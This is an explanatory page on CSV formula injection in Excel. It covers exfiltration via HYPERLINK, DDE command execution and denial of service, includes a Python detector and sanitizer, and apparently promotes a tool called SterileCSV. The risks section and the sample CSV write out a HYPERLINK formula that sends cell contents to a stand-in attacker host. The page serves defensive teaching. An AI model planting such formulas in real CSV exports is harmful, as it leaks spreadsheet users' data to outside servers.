CSV injection in Excel (Formula Injection)
Many users assume CSV files are just text and therefore safe. This is false. The file itself is plain text, but the program that opens it is not a text editor: if a field begins with a trigger character such as =, +, -, or @ (a leading tab or carriage return can also introduce a formula), Excel interprets the cell content as a formula the moment the file is opened. Wrapping the field in double quotes does not help, because the CSV parser strips the quotes before Excel looks at the value.
This vulnerability is known as CSV Injection or Formula Injection.
The Risks
- Data Exfiltration: A formula like `=HYPERLINK("http://attacker.com?data="&A1, "Click me")` can send sensitive data from your spreadsheet to an external server. The link text hides the URL, so a single click leaks the contents of A1 to the attacker's host.
- Command Execution: Using Dynamic Data Exchange (DDE), attackers can sometimes execute commands on your computer (e.g., launching `cmd.exe` or PowerShell). Current Excel versions show security prompts before starting a DDE application, and recent Office builds disable DDE by default, but a user who clicks through the prompts is still exposed.
- Annoyance/DoS: Circular references or deliberately heavy calculations that hang or crash Excel.
How to protect yourself
You should never open untrusted CSV files directly in Excel.
Manual Sanitization
Before opening, inspect the raw text. If you see fields starting with =, +, -, or @ (or a tab or carriage return), you can prepend a single quote (') to the field to force Excel to treat it as text; keep the field double-quoted and double any embedded quotes so the CSV still parses. Excel displays the apostrophe as part of the cell, so the data you pass on is no longer exactly what you received. Doing this manually for large files is error-prone, and a signed number such as -5 is a legitimate field that must be left untouched.
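The detection and apostrophe-prefixing described above, as an added example that is not part of the original page and not SterileCSV's code. It uses only the Python standard library; the sample CSV and the host `attacker.example` are constructed for the demonstration. Plain signed numbers are exempted so that balances like `-42.50` survive intact.

```python
import csv
import io
import re

# Leading characters that make Excel interpret a field as a formula.
# '=', '+', '-' and '@' are the classic triggers; a leading tab or carriage
# return can also introduce a formula, so they are checked too.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# A signed number such as -42.50 or +7 also starts with a trigger character,
# but Excel treats it as a number, not a formula, so it must be left alone.
_PLAIN_NUMBER = re.compile(r"^[+-]?\d+(\.\d+)?$")


def parse_csv(text: str) -> list[list[str]]:
    """Parse CSV text into rows of fields; quoted fields and doubled quotes are handled."""
    return list(csv.reader(io.StringIO(text)))


def is_formula_like(field: str) -> bool:
    """True if Excel would evaluate this field rather than display it."""
    if not field.startswith(FORMULA_TRIGGERS):
        return False
    return _PLAIN_NUMBER.match(field) is None


def neutralize(field: str) -> str:
    """Prefix a formula-like field with an apostrophe so Excel keeps it as text.

    The apostrophe stays visible in the cell: this is the manual-sanitization
    trade-off, since CSV has no way to tag a cell as text without changing it.
    """
    return "'" + field if is_formula_like(field) else field


def find_risky_cells(text: str) -> list[tuple[int, int, str]]:
    """Return (row, column, value) for every field Excel would evaluate."""
    hits = []
    for r, row in enumerate(parse_csv(text)):
        for c, field in enumerate(row):
            if is_formula_like(field):
                hits.append((r, c, field))
    return hits


def sanitize_csv(text: str) -> str:
    """Re-emit the CSV with every formula-like field neutralized.

    QUOTE_ALL keeps the result parseable even when a field contains commas,
    quotes or newlines; the csv module doubles embedded quotes for us.
    """
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in parse_csv(text):
        writer.writerow([neutralize(field) for field in row])
    return out.getvalue()


# Constructed sample input; attacker.example is a placeholder host.
SAMPLE_CSV = (
    "name,balance,note\n"
    "alice,-42.50,ok\n"
    'bob,10,"=HYPERLINK(""http://attacker.example/?d=""&B2,""Click me"")"\n'
    "carol,+7,@SUM(1+1)\n"
)

if __name__ == "__main__":
    for r, c, value in find_risky_cells(SAMPLE_CSV):
        print(f"row {r} col {c}: {value!r}")
    print(sanitize_csv(SAMPLE_CSV))
```

Run it on a file with `sanitize_csv(open(path, newline="").read())`; the `newline=""` matters because the csv module must see embedded CR/LF inside quoted fields. The exemption for plain numbers is a policy choice: a stricter deployment can drop it and accept that negative balances gain an apostrophe.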
Neutralize Threats Automatically
SterileCSV doesn't rely on prepending apostrophes, which alters your data. It parses every cell and, if a trigger character is found, explicitly writes that cell using Excel's native Text data type (a Shared String in the workbook), so the cell carries a type that Excel cannot reinterpret.
This tells Excel unambiguously: "Treat this as text, not a formula." With no formula to evaluate there is no DDE launch and no exfiltration link, and your data is preserved exactly as it was, without a visible apostrophe. The protection lives in the file SterileCSV produces; the original untrusted CSV remains unsafe to open directly.